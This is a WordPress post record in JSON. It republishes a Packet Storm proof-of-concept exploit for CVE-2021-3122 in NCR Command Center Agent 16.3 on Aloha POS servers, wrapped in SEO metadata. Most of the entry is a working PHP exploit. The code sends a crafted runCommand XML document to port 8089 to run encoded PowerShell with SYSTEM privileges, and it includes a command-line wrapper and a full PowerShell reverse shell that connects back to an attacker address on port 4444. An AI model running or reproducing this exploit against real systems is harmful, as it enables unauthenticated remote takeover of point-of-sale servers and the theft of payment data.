{"id":39068,"date":"2026-02-04T11:50:07","date_gmt":"2026-02-04T11:50:07","guid":{"rendered":"http:\/\/localhost\/?p=39068"},"modified":"2026-02-04T11:50:07","modified_gmt":"2026-02-04T11:50:07","slug":"ncr-command-center-agent-163-remote-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39068","title":{"rendered":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:30:27&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214926&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2021-3122&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : NCR Command Center Agent 16.3 RCE Exploit                                                                                   |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.ncr.com\/                                                                                                        |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/211034\/ \\u0026\\tCVE-2021-3122\\n    \\n    [+] Summary    : This PHP implementation provides a tool for testing the CVE-2021-3122 vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. \\n                     The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by sending a specially crafted XML document to port 8089.\\n    \\t\\t\\t\\t \\n    [+] POC : php poc.php\\n    \\n    \\u003c?php\\n    \\n    class NCRCommandCenterExploit {\\n        private $rhost;\\n        private $rport;\\n        private $verbose;\\n        private $timeout = 30;\\n        \\n        public function __construct($rhost, $rport = 8089, $verbose = false) {\\n            $this-\\u003erhost = $rhost;\\n            $this-\\u003erport = $rport;\\n            $this-\\u003everbose = $verbose;\\n        }\\n        \\n        \/**\\n         * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062e\u062f\u0645\u0629\\n         *\/\\n        public function check() {\\n            try {\\n                $socket = $this-\\u003econnect();\\n                \\n                \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0628\u0646\u0631\\n                $banner = $this-\\u003ereadSocket($socket, 1024);\\n                $this-\\u003edisconnect($socket);\\n                \\n                if (strpos($banner, &#8216;\\u003ccmcsys:myNodeNumber&#8217;) !== false) {\\n                    return \\&#8221;Detected\\&#8221;;\\n                }\\n                \\n                return \\&#8221;Safe\\&#8221;;\\n                \\n            } catch (Exception $e) {\\n                return \\&#8221;Safe: \\&#8221; . $e-\\u003egetMessage();\\n            }\\n        }\\n        \\n        \/**\\n         * \u0625\u0646\u0634\u0627\u0621 \u062d\u0645\u0648\u0644\u0629 XML\\n         *\/\\n        private function generateXml($cmdPayload) {\\n            $workitem_id = rand(1, 9);\\n            $source_node = rand(1, 9);\\n            \\n            $exec_statuses = [&#8216;Unknown&#8217;, &#8216;Waiting&#8217;, &#8216;InProgress&#8217;];\\n            $exec_status = $exec_statuses[array_rand($exec_statuses)];\\n            \\n            $dest_servers = [&#8216;WebServer&#8217;, &#8216;RdfServer&#8217;];\\n            $dest_server = $dest_servers[array_rand($dest_servers)];\\n            \\n            $guid = $this-\\u003egenerateGuid();\\n            \\n            $xml_body = &#8216;\\u003cworkitemroot commandname=\\&#8221;runCommand\\&#8221;\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cWorkItem\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cWorkItemId\\u003e&#8217; . $workitem_id . &#8216;\\u003c\/WorkItemId\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cCommandName\\u003erunCommand\\u003c\/CommandName\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cSourceNode\\u003e&#8217; . $source_node . &#8216;\\u003c\/SourceNode\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cTargetNode\\u003e0\\u003c\/TargetNode\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cStatus\\u003e&#8217; . $exec_status . &#8216;\\u003c\/Status\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003c\/WorkItem\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003ccommand\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cArguments\\u003e&#8217; . $cmdPayload . &#8216;\\u003c\/Arguments\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cGuid\\u003e&#8217; . $guid . &#8216;\\u003c\/Guid\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cResult\\u003e\\u003c\/Result\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003cdestserver\\u003e&#8217; . $dest_server . &#8216;\\u003c\/destserver\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003c\/command\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003c\/workitemroot\\u003e&#8217;;\\n            $xml_body .= &#8216;\\u003c:EOM:\\u003e&#8217;;\\n            \\n            return $xml_body;\\n        }\\n        \\n        \/**\\n         * \u062a\u0648\u0644\u064a\u062f GUID \u0639\u0634\u0648\u0627\u0626\u064a\\n         *\/\\n        private function generateGuid() {\\n            if (function_exists(&#8216;com_create_guid&#8217;) === true) {\\n                return trim(com_create_guid(), &#8216;{}&#8217;);\\n            }\\n            \\n            $data = random_bytes(16);\\n            $data[6] = chr(ord($data[6]) \\u0026 0x0f | 0x40); \/\/ version 4\\n            $data[8] = chr(ord($data[8]) \\u0026 0x3f | 0x80); \/\/ variant\\n            \\n            return vsprintf(&#8216;%s%s-%s-%s-%s-%s%s%s&#8217;, str_split(bin2hex($data), 4));\\n        }\\n        \\n        \/**\\n         * \u0625\u0646\u0634\u0627\u0621 \u062d\u0645\u0648\u0644\u0629 PowerShell\\n         *\/\\n        private function createPowerShellPayload($encodedPayload) {\\n            \/\/ \u062d\u0645\u0648\u0644\u0629 PowerShell \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629\\n            $payload = \\&#8221;powershell -exec bypass -enc \\&#8221; . $encodedPayload;\\n            return $payload;\\n        }\\n        \\n        \/**\\n         * \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n         *\/\\n        public function exploit($payload) {\\n            try {\\n                $socket = $this-\\u003econnect();\\n                \\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[+] Connected to {$this-\\u003erhost}:{$this-\\u003erport}\\\\n\\&#8221;;\\n                }\\n                \\n                \/\/ \u062a\u0631\u0645\u064a\u0632 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 (\u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 base64 \u0647\u0646\u0627)\\n                $encodedPayload = base64_encode($payload);\\n                $cmdPayload = $this-\\u003ecreatePowerShellPayload($encodedPayload);\\n                \\n                \/\/ \u0625\u0646\u0634\u0627\u0621 XML\\n                $payloadXml = $this-\\u003egenerateXml($cmdPayload);\\n                \\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[*] Generated payload XML\\\\n\\&#8221;;\\n                }\\n                \\n                \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\\n                $this-\\u003ewriteSocket($socket, $payloadXml);\\n                \\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[*] Payload sent\\\\n\\&#8221;;\\n                    echo \\&#8221;[*] Check your listener\\\\n\\&#8221;;\\n                }\\n                \\n                \/\/ \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n                $response = $this-\\u003ereadSocket($socket, 4096);\\n                \\n                $this-\\u003edisconnect($socket);\\n                \\n                return [\\n                    &#8216;success&#8217; =\\u003e true,\\n                    &#8216;response&#8217; =\\u003e $response\\n                ];\\n                \\n            } catch (Exception $e) {\\n                return [\\n                    &#8216;success&#8217; =\\u003e false,\\n                    &#8216;error&#8217; =\\u003e $e-\\u003egetMessage()\\n                ];\\n            }\\n        }\\n        \\n        \/**\\n         * \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0647\u062f\u0641\\n         *\/\\n        private function connect() {\\n            $socket = @fsockopen($this-\\u003erhost, $this-\\u003erport, $errno, $errstr, $this-\\u003etimeout);\\n            \\n            if (!$socket) {\\n                throw new Exception(\\&#8221;Failed to connect: {$errstr} ({$errno})\\&#8221;);\\n            }\\n            \\n            \/\/ \u062a\u0639\u064a\u064a\u0646 \u0645\u0647\u0644\u0629 \u0644\u0644\u0642\u0631\u0627\u0621\u0629\/\u0627\u0644\u0643\u062a\u0627\u0628\u0629\\n            stream_set_timeout($socket, $this-\\u003etimeout);\\n            \\n            return $socket;\\n        }\\n        \\n        \/**\\n         * \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0625\u0644\u0649 \u0627\u0644\u0633\u0648\u0643\u064a\u062a\\n         *\/\\n        private function writeSocket($socket, $data) {\\n            $written = fwrite($socket, $data);\\n            \\n            if ($written === false) {\\n                throw new Exception(\\&#8221;Failed to write to socket\\&#8221;);\\n            }\\n            \\n            return $written;\\n        }\\n        \\n        \/**\\n         * \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0627\u0644\u0633\u0648\u0643\u064a\u062a\\n         *\/\\n        private function readSocket($socket, $length) {\\n            $data = fread($socket, $length);\\n            \\n            if ($data === false) {\\n                throw new Exception(\\&#8221;Failed to read from socket\\&#8221;);\\n            }\\n            \\n            return $data;\\n        }\\n        \\n        \/**\\n         * \u0642\u0637\u0639 \u0627\u0644\u0627\u062a\u0635\u0627\u0644\\n         *\/\\n        private function disconnect($socket) {\\n            if (is_resource($socket)) {\\n                fclose($socket);\\n            }\\n        }\\n        \\n        \/**\\n         * \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0648\u062f\\n         *\/\\n        public static function exampleUsage() {\\n            $target = \\&#8221;192.168.1.100\\&#8221;;\\n            $port = 8089;\\n            \\n            $exploit = new self($target, $port, true);\\n            \\n            echo \\&#8221;[*] Checking target&#8230;\\\\n\\&#8221;;\\n            $checkResult = $exploit-\\u003echeck();\\n            echo \\&#8221;[*] Check result: {$checkResult}\\\\n\\&#8221;;\\n            \\n            if ($checkResult === \\&#8221;Detected\\&#8221;) {\\n                \/\/ \u062d\u0645\u0648\u0644\u0629 PowerShell \u0639\u0643\u0633\u064a\u0629 \u0645\u062b\u0627\u0644\\n                \/\/ \u064a\u0645\u0643\u0646\u0643 \u062a\u063a\u064a\u064a\u0631\u0647\u0627 \u062d\u0633\u0628 \u0627\u062d\u062a\u064a\u0627\u062c\u0627\u062a\u0643\\n                $reverseShellPayload = &#8216;$client = New-Object System.Net.Sockets.TCPClient(\\&#8221;192.168.1.50\\&#8221;,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\\u003e\\u00261 | Out-String );$sendback2 = $sendback + \\&#8221;PS \\&#8221; + (pwd).Path + \\&#8221;\\u003e \\&#8221;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&#8217;;\\n                \\n                echo \\&#8221;[*] Executing exploit&#8230;\\\\n\\&#8221;;\\n                $result = $exploit-\\u003eexploit($reverseShellPayload);\\n                \\n                if ($result[&#8216;success&#8217;]) {\\n                    echo \\&#8221;[+] Exploit executed successfully\\\\n\\&#8221;;\\n                    if (!empty($result[&#8216;response&#8217;])) {\\n                        echo \\&#8221;[+] Response: \\&#8221; . htmlspecialchars($result[&#8216;response&#8217;]) . \\&#8221;\\\\n\\&#8221;;\\n                    }\\n                } else {\\n                    echo \\&#8221;[-] Exploit failed: \\&#8221; . $result[&#8216;error&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            } else {\\n                echo \\&#8221;[-] Target not vulnerable or service not detected\\\\n\\&#8221;;\\n            }\\n        }\\n    }\\n    \\n    \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0648\u062f \u0645\u0646 \u0633\u0637\u0631 \u0627\u0644\u0623\u0648\u0627\u0645\u0631\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $options = getopt(\\&#8221;h:p:v::\\&#8221;, [\\&#8221;help\\&#8221;, \\&#8221;check\\&#8221;, \\&#8221;exploit:\\&#8221;]);\\n        \\n        if (isset($options[&#8216;h&#8217;]) || isset($options[&#8216;help&#8217;])) {\\n            echo \\&#8221;NCR Command Center Agent RCE Exploit (CVE-2021-3122)\\\\n\\&#8221;;\\n            echo \\&#8221;Usage:\\\\n\\&#8221;;\\n            echo \\&#8221;  -h \\u003chost\\u003e           Target host\\\\n\\&#8221;;\\n            echo \\&#8221;  -p \\u003cport\\u003e           Target port (default: 8089)\\\\n\\&#8221;;\\n            echo \\&#8221;  -v                  Verbose mode\\\\n\\&#8221;;\\n            echo \\&#8221;  &#8211;check             Check if target is vulnerable\\\\n\\&#8221;;\\n            echo \\&#8221;  &#8211;exploit \\u003cpayload\\u003e Execute exploit with payload\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExample:\\\\n\\&#8221;;\\n            echo \\&#8221;  php \\&#8221; . basename(__FILE__) . \\&#8221; -h 192.168.1.100 &#8211;check\\\\n\\&#8221;;\\n            echo \\&#8221;  php \\&#8221; . basename(__FILE__) . \\&#8221; -h 192.168.1.100 -v &#8211;exploit &#8216;whoami&#8217;\\\\n\\&#8221;;\\n            exit(0);\\n        }\\n        \\n        if (isset($options[&#8216;h&#8217;])) {\\n            $host = $options[&#8216;h&#8217;];\\n            $port = isset($options[&#8216;p&#8217;]) ? $options[&#8216;p&#8217;] : 8089;\\n            $verbose = isset($options[&#8216;v&#8217;]);\\n            \\n            $exploit = new NCRCommandCenterExploit($host, $port, $verbose);\\n            \\n            if (isset($options[&#8216;check&#8217;])) {\\n                $result = $exploit-\\u003echeck();\\n                echo \\&#8221;Target: \\&#8221; . $host . \\&#8221;:\\&#8221; . $port . \\&#8221;\\\\n\\&#8221;;\\n                echo \\&#8221;Status: \\&#8221; . $result . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            if (isset($options[&#8216;exploit&#8217;])) {\\n                $payload = $options[&#8216;exploit&#8217;];\\n                $result = $exploit-\\u003eexploit($payload);\\n                \\n                if ($result[&#8216;success&#8217;]) {\\n                    echo \\&#8221;Exploit executed successfully!\\\\n\\&#8221;;\\n                } else {\\n                    echo \\&#8221;Exploit failed: \\&#8221; . $result[&#8216;error&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            }\\n        } else {\\n            echo \\&#8221;Error: Target host is required. Use -h for help.\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    \/\/ \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0643\u0648\u062f \u0645\u0628\u0627\u0634\u0631\u0629 (\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0644\u0644\u0627\u062e\u062a\u0628\u0627\u0631)\\n    \/\/ NCRCommandCenterExploit::exampleUsage();\\n    \\n    ?\\u003e\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214926&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C&#8221;,&#8221;version&#8221;:&#8221;2.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214926\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:30:27&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-39068","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39068\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:30:27&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39068\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T11:50:07+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926\",\"datePublished\":\"2026-02-04T11:50:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068\"},\"wordCount\":1387,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39068#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068\",\"name\":\"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-04T11:50:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39068\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39068#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39068","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:30:27&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote,...","og_url":"https:\/\/zero.redgem.net\/?p=39068","og_site_name":"zero redgem","article_published_time":"2026-02-04T11:50:07+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39068#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39068"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926","datePublished":"2026-02-04T11:50:07+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39068"},"wordCount":1387,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-10.0","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39068#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39068","url":"https:\/\/zero.redgem.net\/?p=39068","name":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-04T11:50:07+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39068#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39068"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39068#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution_PACKETSTORM:214926"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 